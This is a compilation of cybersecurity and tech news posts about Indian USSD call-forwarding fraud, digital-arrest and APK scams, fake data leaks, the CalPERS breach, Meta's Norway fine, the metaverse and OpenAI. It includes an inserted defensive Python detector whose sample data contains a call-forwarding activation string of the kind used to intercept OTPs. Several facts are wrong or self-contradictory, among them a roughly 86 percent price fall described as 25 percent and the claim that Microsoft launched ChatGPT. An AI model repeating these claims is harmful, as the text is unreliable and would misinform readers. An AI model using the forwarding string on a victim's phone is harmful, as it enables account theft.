
USSD Call Forwarding Deactivation: India's Move to Safeguard Against Cyber Fraud

 


The Department of Telecommunications (DoT) has recently taken a step to tackle the surge in online fraud cases across the country. To counter incidents of fraud carried out through illegal call forwarding, the authorities have directed all telecom operators in the country to deactivate their USSD-based call forwarding services from April 15, 2024.

USSD (Unstructured Supplementary Service Data) is a technology that lets mobile users access a wide variety of network services by dialling shortcodes such as *401#. Criminals impersonating customer support trick users into dialling this code followed by a phone number of the criminals' choosing.

As a result, the victim's incoming calls are forwarded to the fraudster. USSD is commonly used to check balances, block numbers and retrieve other information by dialling simple codes, and it is this system that the DoT considers vulnerable to such social engineering attacks.

USSD supports several services, including call forwarding and rerouting of a phone number. Besides checking mobile balances and IMEI numbers, it is also commonly used to check the status of a handset. The order was issued as a result of an ongoing investigation into frauds involving mobile phones and online crime.

The decision responds to a rising number of complaints about fraud and misuse and to the growing number of online scams built on the call forwarding feature. Once the USSD-based service is suspended for a number, users who already have call forwarding enabled on it will need to reactivate it.

There have been rumours that users may have to use alternative methods, not yet specified, to activate call forwarding. The traditional way for users to manage the forwarding of their calls will need to be replaced by alternatives offered by the providers. The suspension of USSD-based call forwarding comes amid concerns about the susceptibility of such services to fraud within the telecommunications sector.

While the request does not imply a permanent removal of the service, there are speculations that it may be reintroduced in the future with enhanced security measures to prevent misuse and fraud. Telecommunications fraud often involves cybercriminals exploiting vulnerabilities within call forwarding systems to unlawfully access sensitive information. 

One prevalent tactic utilized by fraudsters involves persuading unsuspecting users to enable call forwarding to alternative phone numbers via USSD commands. Once activated, these diverted calls serve as a conduit for intercepting confidential data, such as one-time passwords (OTPs), intended for authentication purposes. 

The USSD service, accessed by inputting specific codes on mobile keypads, offers various functionalities including prepaid balance checks and IMEI retrieval. Among these functions is the activation of unconditional call forwarding, a feature now under scrutiny due to reported instances of misuse. 
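As an added example (not code from the original post), the Python below parses dialled MMI/USSD strings and flags the ones that activate or register call forwarding, the check a security-aware dialler or a call-log audit would apply before the forwarding takes effect. The standard service codes come from 3GPP TS 22.030; the *401 entry is the operator-specific code mentioned in the post and is treated here as an assumption rather than a standard code.

```python
"""Classify dialled MMI/USSD strings and flag those that redirect incoming calls.

Standard call-forwarding service codes are from 3GPP TS 22.030; the '*401'
entry is the operator-specific code named in the post and is treated here as
an assumed carrier shortcode, not a standard one.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Supplementary service codes for call forwarding (3GPP TS 22.030).
CALL_FORWARDING_CODES = {
    "21": "unconditional",
    "67": "on busy",
    "61": "on no reply",
    "62": "when not reachable",
    "002": "all forwarding",
    "004": "all conditional forwarding",
}

# Assumed operator-specific shortcode that also sets up forwarding (see post).
OPERATOR_FORWARDING_CODES = {"401"}

# Procedure prefixes per TS 22.030.
PROCEDURES = {
    "*": "activate",
    "**": "register",     # register a forwarded-to number and activate
    "#": "deactivate",
    "##": "erase",
    "*#": "interrogate",  # query only, changes nothing
}

# Two-character prefixes are listed before one-character ones so the regex
# alternation tries them first.
_MMI_RE = re.compile(
    r"^(?P<proc>\*\*|\*#|##|\*|#)"   # procedure prefix
    r"(?P<sc>\d{2,3})"               # service code
    r"(?:\*(?P<si>[^#*]*))?"         # first supplementary info (usually the number)
    r"(?:\*[^#]*)?#$"                # further SI fields (basic service, timer), then '#'
)


@dataclass
class MmiVerdict:
    raw: str
    procedure: Optional[str]  # activate / register / deactivate / erase / interrogate
    service: Optional[str]    # forwarding type, or None if not a forwarding code
    target: Optional[str]     # forwarded-to number when one is supplied
    risky: bool               # True when the string would move incoming calls elsewhere


def classify_mmi(dialled: str) -> MmiVerdict:
    """Parse one dialled string and decide whether it sets up call forwarding."""
    s = re.sub(r"\s+", "", dialled)
    m = _MMI_RE.match(s)
    if not m:
        # Ordinary phone number or something the MMI grammar does not cover.
        return MmiVerdict(s, None, None, None, False)
    proc = PROCEDURES[m.group("proc")]
    sc = m.group("sc")
    target = m.group("si") or None
    service = CALL_FORWARDING_CODES.get(sc)
    if sc in OPERATOR_FORWARDING_CODES:
        service = "operator-specific forwarding (assumed)"
    # Activation and registration both redirect calls; '*21#' alone re-activates
    # a previously registered number, so a missing target is still risky.
    risky = service is not None and proc in ("activate", "register")
    return MmiVerdict(s, proc, service, target, risky)


def flag_forwarding_attempts(dial_log: List[str]) -> List[MmiVerdict]:
    """Return the entries of a dial history that would set up call forwarding."""
    return [v for v in map(classify_mmi, dial_log) if v.risky]


# Constructed sample dial history (not real data): routine USSD use mixed with
# the kind of string a fake "customer support" caller asks the victim to dial.
SAMPLE_DIAL_LOG = [
    "*121#",             # balance check
    "*#06#",             # IMEI query
    "9876543210",        # ordinary call
    "**21*9876543210#",  # register + activate unconditional forwarding
    "#21#",              # deactivate unconditional forwarding
]

if __name__ == "__main__":
    for verdict in flag_forwarding_attempts(SAMPLE_DIAL_LOG):
        print(f"WARNING: {verdict.raw} -> {verdict.procedure} {verdict.service} "
              f"forwarding, target {verdict.target}")
```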

The DoT's directive to deactivate USSD-based call forwarding is a proactive measure aimed at disrupting fraudulent schemes. By eliminating this option, telecom operators can prevent fraudsters from exploiting the feature for illicit activities. This action not only protects mobile phone users but also bolsters the integrity of the telecommunications infrastructure.

In summary, the mandated suspension of USSD-based call forwarding services marks a significant stride in combating fraudulent practices in the telecommunications realm. By depriving fraudsters of a crucial tool, the DoT's initiative contributes to the advancement of cybersecurity and fosters a safer digital landscape for both consumers and businesses.

Digital Arrest Scam: Woman Doctor Duped for 40 Lakhs, Loses Her Entire Savings

Digital Arrest Scam

In today’s digital world, our lives are interconnected through the internet. From shopping on the web and managing finances to connecting with our loved ones, everything is done online these days. 

But the comfort also comes with some risks. 

Professor scammed with Rs 40 Lakhs 

In a recent online scam, a professor at a government medical university fell victim to a "digital arrest" scam and was tricked into paying Rs 40 lakhs. In a "digital arrest" scam, the scammer deceives the victim while posing as a law enforcement agency.

“An arrest warrant has been issued in your name. All your financial accounts will be frozen and they will be investigated. Till then you are put under ‘digital arrest’. After that they called me on Skype and showed me many documents which included my phone number, Aadhaar number, and which also included my arrest warrant,” she said.

The Attack: What happened?

On March 11, the professor received a call purportedly from Maharashtra. The caller alleged that a phone number issued under her ID in July 2023 was involved in illegal activities, including text message scams, phishing, and money laundering.

The call was then transferred to another individual claiming to be from the Maharashtra police headquarters. This person accused her of opening a fraudulent account in Canara Bank, Mumbai, leading to money laundering activities. The caller even spoke about an arrest warrant issued in her name.

The scammer threatened her, stating that all her financial cards, PAN, and Aadhaar had been blocked. They claimed she was under ‘digital arrest’.

To add to her distress, the scammers showed her documents via Skype, including her phone number, Aadhaar number, and the alleged arrest warrant.

The professor was coerced into transferring a staggering amount of Rs 31.31 lakh on March 11, followed by Rs 9 lakh from another account the next day.

The scammers instructed her to maintain constant communication, provide personal information, and refrain from contacting anyone else, citing national security concerns and the purported involvement of police and bank officials in the scam.

Realizing she had fallen victim to cyber fraud, she promptly reported the incident to the cybercrime police station and filed a formal complaint.

Impact of the attack

According to police, “A staggering amount of Rs 31.31 lakh was transferred by her on March 11, followed by Rs 9 lakh from another account the next day.” 

The stolen money was the professor’s entire savings, which she had kept for her kids’ studies and her future.

Triveni Singh, a former SP in the Cyber Cell and a cyber expert, said that no reputable agency will request a Skype chat for the purpose of an investigation or an arrest. There is no such thing as a 'digital arrest'.


Decoding Cybercriminals' Motives for Crafting Fake Data Leaks

 

Companies worldwide are facing an increasingly daunting challenge posed by data leaks, particularly due to the rise in ransomware and sophisticated cyberattacks. This predicament is further complicated by the emergence of fabricated data leaks. Instead of genuine breaches, threat actors are now resorting to creating fake leaks, aiming to exploit the situation.

The consequences of such falsified leaks are extensive, potentially tarnishing the reputation of the affected organizations. Even if the leaked data is eventually proven false, the initial spread of misinformation can lead to negative publicity.

The complexity of fake leaks warrants a closer examination, shedding light on how businesses can effectively tackle associated risks.

What Drives Cybercriminals to Fabricate Data Leaks?

Certain cybercriminal groups, like LockBit, Conti, Cl0p, and others, have gained significant attention, akin to celebrities or social media influencers. These groups operate on platforms like the Dark Web and other shadowy websites, and some even have their own presence on the X platform (formerly Twitter). Here, malicious actors publish details about victimized companies, attempting to extort ransom and setting deadlines for sensitive data release. This may include private business communications, corporate account login credentials, employee and client information. Moreover, cybercriminals may offer this data for sale, enticing other threat actors interested in using it for subsequent attacks.

Lesser-known cybercriminals also seek the spotlight, driving them to create fake leaks. These fabricated leaks generate hype, inducing a concerned reaction from targeted businesses, and also serve as a means to deceive fellow cybercriminals on the black market. Novice criminals are especially vulnerable to falling for this ploy.

Manipulating Databases for Deception: The Anatomy of Fake Leaks

Fake data leaks often take the form of parsed databases: collections of information extracted from open sources that contain no sensitive data. The process, known as internet parsing or web scraping, pulls text, images, links and other data from websites. Threat actors use parsing to gather data for malicious purposes, including the creation of fake leaks.

In 2021, a prominent business networking platform encountered a similar case. Alleged user data was offered for sale on the Dark Web, but subsequent investigations revealed it was an aggregation of publicly accessible user profiles and website data, rather than a data breach. This incident garnered media attention and interest within the Dark Web community.

When offers arise on the Dark Web, claiming to provide leaked databases from popular social networks like LinkedIn, Facebook, or X, they are likely to be fake leaks containing information already publicly available. These databases may circulate for extended periods, occasionally sparking new publications and causing alarm among targeted firms.

According to Kaspersky Digital Footprint Intelligence, the Dark Web saw an average of 17 monthly posts about social media leaks from 2019 to mid-2021. However, this figure surged to an average of 65 monthly posts after a significant case in the summer of 2021. Many of these posts, as per their findings, may be reposts of the same database.

Old leaks, even genuine ones, can serve as the foundation for fake leaks. Presenting outdated data leaks as new creates the illusion of widespread cybercriminal access to sensitive information and ongoing cyberattacks. This strategy helps cybercriminals establish credibility among potential buyers and other actors within underground markets.

Similar instances occur frequently within the shadowy community, where old or unverified leaks resurface. Data that's several years old is repeatedly uploaded onto Dark Web forums, sometimes offered for free or a fee, masquerading as new leaks. This not only poses reputation risks but also compromises customer security.

Mitigating Fake Leaks: Business Guidelines

Faced with a fake leak, panic is a common response due to the ensuing public attention. Swift identification and response are paramount. Initial steps should include refraining from engaging with attackers and conducting a thorough investigation into the reported leak. Verification of the source, cross-referencing with internal data, and assessing information credibility are essential. Collecting evidence to confirm the attack and compromise is crucial.

For large businesses, data breaches, fake leaks included, are a matter of "when," not "if." Transparency and preparation are key in addressing such substantial challenges. Developing a communication plan beforehand for interactions with clients, journalists, and government agencies is beneficial.

Additionally, constant monitoring of the Dark Web enables detection of new posts about both fake and real leaks, as well as spikes in malicious activity. Due to the automation required for Dark Web monitoring and the potential lack of internal resources, external experts often manage this task.

Furthermore, comprehensive incident response plans, complete with designated teams, communication channels, and protocols, facilitate swift action if such cases arise.

In an era where data leaks continuously threaten businesses, proactive and swift measures are vital. By promptly identifying and addressing these incidents, conducting meticulous investigations, collaborating with cybersecurity experts, and working with law enforcement, companies can minimize risks, safeguard their reputation, and uphold customer trust.

Fines for Facebook Privacy Breaches in Norway Crack Down on Meta

 


From August 14, the Norwegian Data Protection Authority (Datatilsynet) will fine Meta Platforms, the owner of Facebook, 1 million crowns ($98,500) over a privacy breach. A penalty of this magnitude could have major implications for other European countries, since it may set a precedent.

In a court filing, Meta Platforms has asked a court in Norway to stay a fine imposed on the company, which owns Facebook and Instagram, by the Nordic country's data regulator. The regulator argued that the company breached users' privacy via Facebook and Instagram.

Meta Platforms has filed a court petition requesting a temporary injunction to prevent the order from being executed. The petition will be heard at a two-day hearing on August 22. Meta's Norwegian lawyer referred media inquiries to the company, which did not respond to a request for comment.

According to Datatilsynet, Meta Platforms have been instructed not to collect any personal data related to users in Norway, including their physical locations as part of behavioral advertising, i.e. advertising that is targeted at specific user groups. 

This kind of data collection is widespread among Big Tech companies. Tobias Judin, head of Datatilsynet's international section, said the company will be fined 1 million crowns per day from next Monday if it does not comply with the order.

Meta Platforms has filed a court protest against the fine, according to Datatilsynet. The order is effective until November 3; Datatilsynet can refer the decision to the European Data Protection Board, which has the authority to endorse it, after which the Norwegian regulator could make the fine permanent.

If approved, the decision would have an impact across the entire European region. For now, Datatilsynet has not taken further steps to implement these measures. Meta recently announced that it intends to seek users' consent in the European Union before allowing businesses to target them with advertisements based on how they interact with Meta's services, such as Instagram and Facebook.

Judin said that Meta's proposed method of seeking consent was insufficient and that relying on it would be unwise. He therefore required Meta to cease the data processing immediately and not resume it until a fully functional consent mechanism is in place. In the meantime, he said, people's rights are being violated, even though many of them are unaware of it.

A Meta spokesperson explained that the decision to modify their approach was prompted by regulatory obligations in the European region, which came as a result of an order issued in January by the Irish Data Protection Commissioner regarding EU-wide data protection regulations. 

According to the Irish authority, which acts as Meta's lead regulator within the European Union, the company must now review the legal basis for the methods it uses to target customers with advertisements. Norway is not a member of the European Union but is part of the European Single Market.

Elevated Cybercrime Risks in Metro Cities: Understanding Urban Vulnerabilities

 


Cyber fraudsters in metropolitan cities understand how people think, and it is no surprise that they tailor their "services" to people with busy lives, delivering them quickly and efficiently. Experts have found that this puts city dwellers at a higher risk of scams. With the help of cyber security experts and victims, CNBC-TV18 gets to the bottom of the problem.

As cybercrime becomes more common, major metropolitan cities are seen as prime targets, and criminals set up more operations there to achieve their goals. The gravity of the situation can be gauged from Chennai alone, which has suffered nearly 8 million malware-related attacks.

Metropolitan cities are more vulnerable to cybercrime because they have a great deal of digital infrastructure and online services, yet they lack strong data protection policies for their customers. As cybercrime rises, criminals' attention concentrates on the country's major metropolitan areas.

Chennai alone, which recorded nearly 8 million malware-related attacks last year, illustrates the gravity of the situation.

QuickHeal has announced in its official report that it detects and blocks more than 80,000 malware threats every hour of the day, and it estimates that there have been more than 1.91 million ransomware attacks to date. Numerous attacks took advantage of the pandemic. The Aarogya Setu app, which people were required to install on their smartphones, was also used as a lure.

People and organizations needed to track Covid-19-related information on the internet and social media regularly, and attackers took advantage of this by creating and spreading fake COVID-19 links.

Users clicked the links in these messages and malicious files were loaded onto their systems; many of these files were detected and blocked by antivirus software. The phishing links were not limited to Covid-19 themes but also offered jobs, free internet, online money and other enticing things.

QuickHeal reports that people are becoming more familiar with digital tools and antivirus software for protecting their computers. Despite this, there is still a long way to go, since most people do not yet treat safe Internet use as a priority.

The most frequently detected malware types, in order, were Trojans, Infectors, Worms and Potentially Unwanted Applications (PUAs). Ransomware still has its place in the threat landscape: it continues to encrypt sensitive user information, which attackers then sell on the dark web for money.

According to cybersecurity experts, many companies do not take data security seriously and outsource the maintenance of their data to third parties. These third parties then sell the data to cyber criminals, who gain easy access to it. More data means more opportunities for cyber fraudsters to commit fraud.

In 2019, according to the National Crime Record Bureau, there were 18,500 cases of cyber fraud reported in 19 metropolitan cities of the country, which accounted for 41 percent of the total cases of cyber fraud detected in the country. This number increased marginally in 2020 as 18,657 cases were reported in the metropolises of India - 37 percent of India's total number of cases that year. 

Cyber fraud cases in metropolitan cities fell in 2021, with 17,115 cases reported, accounting for 32 percent of all cyber fraud cases in India. Experts estimate that there are many more cases than are reported.

The authorities are aware of the high number of cybercrime incidents targeting metropolitan cities. Several states and cities have created specialized cyber cells to combat such frauds, and these cells work together. However, the authorities say operational hurdles have made it difficult to eradicate such crimes.

When a person realizes that they have been scammed, experts recommend that they log onto the cybercrime portal or call 1930 immediately. Any request for personal information, such as a debit or credit card PIN or a one-time password, should raise red flags and should be reported as soon as possible.

Furthermore, these experts urge that all online transactions should only be carried out through secure, verified portals, and individuals should not upload sensitive documents or information to unverified or unknown portals without prior confirmation from the portal's owner.

Cybersecurity experts recommend that people avoid answering video calls from unknown numbers and not fall for lucrative offers: anything that seems too good to be true is a scam. The best defence against cybercrime remains precaution and awareness.

According to the National Crime Records Bureau (NCRB), 962 cybercrime cases were reported in India in 2014, 11,592 cases were investigated in 2015, and 12,317 cases were reported in 2016. I believe that cybercrime incidents in India are increasing.

Business is moving online, which means organizations have to ensure the network that their customers are using is safe and secure. As well as upgrading their technology, they should also hire employees with good management and security skills, who are trained in the protocols of security management, and who are adept at managing and securing sensitive customer data. 

Protecting adults' data is of paramount importance, especially for those over the age of 75, who often have an insufficient understanding of how the technology works. Companies and individuals alike must understand how to tackle cyberattacks and educate the public on how to detect them.

A Major Public Pension Fund Suffered a Massive Data Breach

 

It was reported Wednesday that hackers stole the names and Social Security numbers of around 769,000 retirees and beneficiaries of the California Public Employees' Retirement System (CalPERS), along with their birth dates and other personal information. The attackers exploited vulnerabilities in a contractor's systems; the personal information of some CalPERS members was exposed in a breach at that third party.

According to CalPERS, PBI Research Services/Berwyn Group informed it on June 6 that its database had suffered a security breach. The hack was carried out through a popular application used for transferring files between systems.

CalPERS has more than 2 million members throughout the country, making it the largest pension fund in the country; it also provides medical insurance covering the health needs of over 1.5 million members and their families. A spokesperson for CalSTRS, the second-largest public pension plan in the country, told reporters Thursday that it had also been breached through the same vendor, though no details about the victims were given at the time. CalSTRS has since reported that 415,000 members and beneficiaries were affected.

CalPERS uses PBI's MOVEit Transfer service to exchange data and verify benefit information so that payments to retirees and beneficiaries remain accurate and overpayments and other errors are prevented; the application encrypts data as part of that process. MOVEit Transfer is used by thousands of organizations and millions of people worldwide, and the application itself was at the centre of the data breach.

CalPERS retirees and their survivors were exposed to the vulnerability that PBI has since identified and resolved. Law enforcement has also been notified of the incident. 

There are 17,000 teachers enrolled in the CalSTRS system. This is the largest teachers' retirement system in the United States and the second-most comprehensive pension fund in the world after Social Security. With more than 947,000 members, it is one of the largest mutual insurers in the world. 

In its latest release, CalPERS said it has not yet identified the specific vulnerability in the MOVEit Transfer application that was reported to it on June 6 by its third-party vendor, PBI Research Services; the vulnerability has since been fixed.

PBI allows CalPERS to identify death cases among its members and ensure proper payments are made to beneficiaries and retirees alike. 

CalPERS said that the app's vulnerability allowed third parties to download information such as first and last names, dates of birth and Social Security numbers. The names of family members may also have been accessible.

According to CalPERS, the breach affected neither CalPERS' information systems nor myCalPERS, the portal used by active members. Members' monthly benefit payments will not be affected either.

This breach did not affect CalPERS' information security systems. Although this is true, CalPERS has incorporated new security protocols for its website, call centers, and office locations. Members will be able to continue receiving monthly pension payments as per their personal preferences in the future. 

CalPERS has partnered with Experian to offer members whose personal information was stolen two years of credit monitoring and an identity restoration service. Affected members received letters explaining how to access these services.

It was reported on CalPERS' website earlier this week that all affected members are eligible for two years of free credit monitoring and identity restoration through Experian through an online Q&A posted there. 

The CalPERS agency mailed letters Thursday with an agency logo and a message signed by the CEO. The letters explain what options are available and how to enroll in them.

As reported by Brett Callow, threat analyst at the cybersecurity firm Emsisoft, the hackers behind the attack claim that they have hit hundreds of businesses, government agencies, and other entities throughout the world that did not protect themselves from the attack. 

Approximately 100 companies have reported personal data theft so far, Callow said, and about 30 more are expected to do so soon. In an official report issued last week, the U.S. Department of Health and Human Services said the breach had affected millions of Americans.

Those who have not received a letter but believe their personal information was affected may call 833-919-4735. The call centre operates Monday through Friday from 6:00 a.m. to 8:00 p.m. Pacific Time, and on Saturdays and Sundays from 8:00 a.m. to 5:00 p.m.

The California Public Employees' Retirement System also encourages its members to regularly review and monitor their accounts and credit history for unauthorized transactions or activity. It also encourages them to notify local police if fraud or identity theft occurred.

Fraudsters Target Kolkatans With Message-Forwarding Software

 


As online financial transactions became simpler and easier, the number of fraudulent digital transactions also increased, and the fraudsters have grown increasingly sophisticated. After phishing and lottery scams, cybercriminals have gradually moved to other platforms to dupe naive and gullible people, especially those inexperienced with financial transactions.

Another method fraudsters use is to send Kolkatans text messages containing links. The linked pages tell recipients that a substantial amount has been credited to their gaming accounts.

Police said that if a recipient clicks such a link to claim the money, the entire balance may be transferred from the victim's account to the fraudsters' account, without the victim ever being asked to share an OTP.

The UPI platform is used in several types of fraud. None of these stems from a flaw in UPI itself; they are the result of deception by criminals.

Analysts call it APK fraud because victims are tricked into clicking links sent by the fraudsters and downloading APK files that compromise their phones.

Downloading the APK file installs an SMS-forwarding application on the device that diverts all incoming text messages to another number. The victim therefore receives no SMS alert when money is debited from his or her account, an officer at the Lalbazar cyber cell said.

Gaining remote access to victims' phones has become a weapon of choice for fraudsters. According to the officer, the fake message claims that a large amount has been credited to the recipient's gaming account.

It was reported by the Calcutta Telegraph that some Calcuttans who have been contacted had received messages saying: "Hi 9830xxxxx9 (mobile number of the recipient), The transaction of Rs 96793 has been completed to your (the name of the online gaming app). "

According to the police, victims of fraud never realize how they were cheated because they had never given their personal identification number to anyone else before being duped. 

According to a senior police officer, unlike other fraud attacks that are sent from random phones and do not address the recipient directly, the messages sent as part of the APK scam target specific individuals and are customized to them. 

There was a time when such text messages were sent at random, but that has changed. What makes these messages look authentic and trustworthy, the officer said, is that they include the phone number of the person they are addressed to.

In the immediate aftermath of clicking the link in the message, the recipient will see two attachments appear on his or her screen.

If the first attachment is clicked, a screen-sharing application is silently installed on the phone, giving the fraudsters direct access to it. If the second attachment is clicked, an SMS-forwarding product is installed, so that when the fraudsters use the screen-sharing software to carry out transactions on the victim's bank account, the victim receives no text messages from the bank, the officer explained.

According to Assistant Commissioner Atul V., their top priority area is creating awareness among their officers about the APK fraud, which has been a major problem for some time. 

A cyber expert added that the APK fraud is designed to make it difficult for the police to trace the fraudsters through the link in the message when a victim reports the matter, because the link is active only for a short period.

Several people have been scammed this way: they receive text messages containing spurious links and are asked to click on them. After a certain period, clicking the link only redirects the browser to a popular search engine. Since the links stay active for only a few hours, if that long, law-enforcement agencies have no way to track the APK files or the transactions that took place, explained a cyber expert in Kolkata.

AI: the cause of the metaverse's demise?

In a dramatic change from its past plans to create a virtual world known as "the metaverse," Facebook has taken a completely different direction. The project consumed billions of dollars and resulted in a cumulative loss of $26 billion. Under investor pressure, Facebook and other companies let the metaverse die and turned to the latest trend: artificial intelligence.

Abandoned by the business world, the metaverse, a once-hot technology that promised users a disorienting, video-game-like virtual world in which to interact awkwardly, has died three years after being touted as a new era in communication technology.

Mark Zuckerberg, CEO of Meta Platforms, has abandoned his ambitious metaverse project to focus on artificial intelligence (AI) and the AI industry. Zuckerberg had planned to launch the metaverse as his next big thing, but instead quietly shelved the project indefinitely.

Zuckerberg announced in a post on Monday, 27 February, that Meta would establish a product group dedicated to generative artificial intelligence.

The advent of the metaverse was once touted as the dawn of a dynamic, remote, interactive environment and regarded as a turning point in technology. Despite its initial success, it faced severe criticism and backlash once it became the talk of the town, and in recent years interest has rapidly declined. Although Zuckerberg reintroduced the metaverse concept, he is no longer pitching it to advertisers for the same reason.

Virtual real estate is becoming more popular. The price of Ethereum, the cryptocurrency that powers so much of this activity, has a direct impact on the value of virtual land in the metaverse, and with Ethereum prices volatile recently, many buyers and sellers struggle to keep up with the market.

WeMeta also reports that the average sale price of a virtual land parcel has plummeted over the past year from over US$11,000 to under US$2,000, a significant drop compared with average sale prices for physical land parcels.

Virtual land sales also fell by a remarkable 85% in 2022. As a result, Ethereum-based metaverse projects such as Decentraland and Sandbox are seeing significant reductions in their valuations and other key metrics.

In February 2022, land sold across Decentraland reached some of its highest prices ever, averaging, at the time of this writing, US$37,200 per acre. By August, the average value had fallen to US$5,100, a decrease of approximately 25 percent. Sandbox's average sale price likewise dropped from around US$35,500 in January to US$2,800 in August.

The volatility of cryptocurrency prices, specifically Ethereum, has introduced substantial uncertainty into the market and left investors unsure about virtual investments. Furthermore, this version of the metaverse currently lacks proper infrastructure, governance, and collaboration. Some people may therefore believe the metaverse is nothing more than a marketing gimmick at the moment.

The metaverse has now joined the list of failed tech ideas buried at the deep end of the graveyard. The way it was born and died, to the annoyance of the tech world, shows how strongly the industry was swayed by the technology.

Advances in AI have a real possibility of revolutionizing how consumers and businesses operate, as the shift to AI shows. A chatbot powered by artificial intelligence can automate repetitive tasks efficiently, and an AI-powered search engine such as ChatGPT can respond to queries in a human-like fashion. As Reality Labs places more emphasis on AI, it may reduce the company's losses and open new possibilities for it to tap into in the future.

AI, one of the fastest-developing fields, continues to make rapid advances in many industries, including marketing, media, and even healthcare. According to Gartner, a leading research company, generative AI in these fields is predicted to grow dramatically in the near term: by 2025, the share of outbound marketing messages from large organizations that are created by generative AI will rise from less than 2 percent in 2022 to 30%. Generative AI's impact on society will not stop there, however.

Gartner also projects that, in the transition from text to video, 90% of the content could be handled by AI by 2030, with 90% of the content coming from AI and the rest from human input.

Generative artificial intelligence has vast possibilities, but access to it is not as wide as it could be. ChatGPT and its mechanisms, for example, are not open-sourced, so it is not available to the public in any way, and this limitation makes it difficult for other companies to replicate the model. Facebook intends to make these types of AI models smaller, which will make them more accessible and easier for companies to use, enabling generative AI to become more widespread and widely available in the future.

Some reports suggest that this is the end of the metaverse. Others suggest that we shouldn't think of Meta's redirection as a rejection of the metaverse at large. Computer scientist Roy Amara formulated Amara's Law, which states that humans often misjudge a technology's timing and potential, overestimating or underestimating its short-term impact and drastically underestimating its lasting impact in the long run. The skepticism and hype surrounding emerging technologies such as self-driving cars, virtual reality (VR), and augmented reality (AR) are examples of this tendency. The internet itself was once considered a fad.

AI, especially generative AI, may also lead to more convincing environments and characters in the metaverse, which could mean significant advancements for the metaverse as a whole.

Some deny the metaverse's death and even its waning popularity. This is especially true for women. It is predicted that the metaverse will succeed in the future as many companies adopt it.

Nevertheless, for this to happen, some structural changes will be necessary. VR headsets will need to be sold at a significantly lower price to be affordable, and they will need to be more private.

In the beginning, all inventions were just ideas, ones that had the potential to be terrifying. As time goes on, these small technological innovations become so integrated into our daily lives that we can no longer imagine a world without them. The metaverse may tend toward this fate, or another immersive technological invention may replace it soon, so whether or not it will emerge again must be discussed.

A metaverse can be described as a virtual platform that creates a social network of sorts, and there is potential here. Nonetheless, a fully functional system should integrate interactive technologies such as VR, AR, and AI. Generative AI does not necessarily spell the end of the metaverse; the two could benefit each other's development by promoting each other's success.

OpenAI, the Maker of ChatGPT, Does not intend to Leave the European Market

According to sources, Sam Altman, CEO of OpenAI, the maker of ChatGPT and creator of artificial intelligence technology, has in the past publicly favored regulation of AI technology development. More recently, however, he has indicated that he opposes overregulation of the technology. Reports indicate that Altman, who led Microsoft's AI research initiative, stated that his company might leave the European Union (EU) if it could not comply with EU rules, and then had a sudden change of heart about that threat.

In a conversation on Friday, Altman retracted his statement that the company might leave Europe if pending laws on artificial intelligence made compliance too difficult, reversing the threat he had made earlier in the week.

The European Union is currently working on the first global set of rules governing artificial intelligence. On Wednesday, Altman called the current draft of the EU Artificial Intelligence Act "over-regulated."

The European Union is well on its way to establishing a set of rules for regulating artificial intelligence globally.

This action by the EU is in tandem with the advocacy of OpenAI, the company behind ChatGPT, which has sought regulation of 'superintelligent' artificial intelligence. The Guardian reports that such a regulator would need to act as the equivalent of the IAEA, with the power to prevent humanity from accidentally creating something that could destroy it if not controlled correctly.

The proposed laws would require generative AI companies to disclose copies of the copyrighted content used to train their systems, which they use to create text and images.

AI companies want to imitate performers, actors, musicians, and artists, training their systems on those individuals' work so that the systems can act as though they performed it.

According to Time Magazine, Mr. Altman is concerned that it would be technically impossible for OpenAI to comply with the AI Act's safety and transparency restrictions.

Rules for AI in the EU 

A set of rules for artificial intelligence in the EU has already been developed. Under these regulations, it is estimated that within the next few years a significant amount of copyrighted material will have been found to have been used to develop the algorithms deployed by companies such as ChatGPT and Google's Bard.

A draft of the bill was approved by EU officials earlier this month and will now be discussed by representatives of the European Parliament, the Council of the European Union, and the European Commission to finalize the details before it is enacted into law.

Google CEO Sundar Pichai has reportedly also met with European Commission officials to discuss AI regulation. According to reports, he is working with European legislators on a voluntary set of rules or standards to serve as a stopgap while AI innovation continues in Europe.

There has been a lot of excitement and alarm around chatbots powered by artificial intelligence (AI) since Microsoft launched ChatGPT, a powerful AI-powered chatbot. Its potential has provoked both excitement and concern, and it has also brought conflict with regulations on AI applications.

OpenAI CEO Sam Altman irritated EU officials when he told reporters in London that if future regulations were too tight, OpenAI might have to cease operating in the bloc.

In March, Italian data regulator Garante shut down the OpenAI app, accusing OpenAI of violating EU privacy rules and setting off a clash between the company and its regulators. After instituting enhanced privacy measures for users, ChatGPT returned online and continues to serve its customers.

The following month, in a blitz against Google, Microsoft made several announcements of this kind, including that it would spend billions of dollars supporting OpenAI and use its technology in a variety of its products.

In recent weeks, New York-based Altman, 38, has received rapturous welcomes from leaders across the globe, from Nigerian leaders to London politicians.

Nevertheless, Thierry Breton, the bloc's industry commissioner, found Altman's remarks on the AI Act frustrating. The regulation is aimed at preventing invasive surveillance and other technologies from making people fear for their safety.

In a recent statement, OpenAI said it would award ten grants of equal value from a $1 million fund to study the governance of AI software, which Altman described as "the process of democratically determining AI systems' behavior."

On Wednesday, Mr. Altman attended an event at University College London, where he stressed his optimism that AI would lead to increased job creation and decreased inequality across the world.

He also held several meetings with Prime Minister Rishi Sunak and the heads of DeepMind and Anthropic to discuss the risks of artificial intelligence, from disinformation to national security to "existential threats," as well as the voluntary actions and regulatory framework needed to address those risks. Some experts are concerned that super-intelligent AI systems may threaten mankind's existence.

A 'generative' Large Language Model (LLM) system is built by analyzing massive sets of data, from which it generates new content.

If the law takes effect, companies like OpenAI will be required to reveal the types of copyrighted material used to train the artificial intelligence systems with which they produce text and images.

Under the proposed legislation, facial recognition in public places and predictive policing tools may also be prohibited by an updated set of regulations.

ChatGPT, backed by Microsoft, was introduced late last year and has since grown exponentially, reaching 100 million monthly users in a matter of weeks and becoming the fastest-growing consumer application in history.

As part of its commitment to integrating OpenAI technology into all of its products, Microsoft acquired a 13 billion dollar stake in the company in 2019.

OpenAI first faced regulators during its domestic launch, when it clashed with European regulator Garante in March and was accused of flouting European data privacy rules. With updated privacy measures, ChatGPT committed to users' privacy and restored the chat service.

Using Ransomware to Extort Employers by Impersonating a Gang

In a court in Fleetwood, Hertfordshire, a 28-year-old United Kingdom man has been found guilty of serving his employer with a forged document and of unauthorized access to its computer with criminal intent.

SEROCU has released a press release explaining the conviction of Ashley Liles, 29, who according to the release was working as an IT Security Analyst at a company in Oxford when it fell victim to a ransomware attack in February 2018.

The cybercriminals contacted the company's executive team to demand a ransom payment, the same plan used in many ransomware attacks.

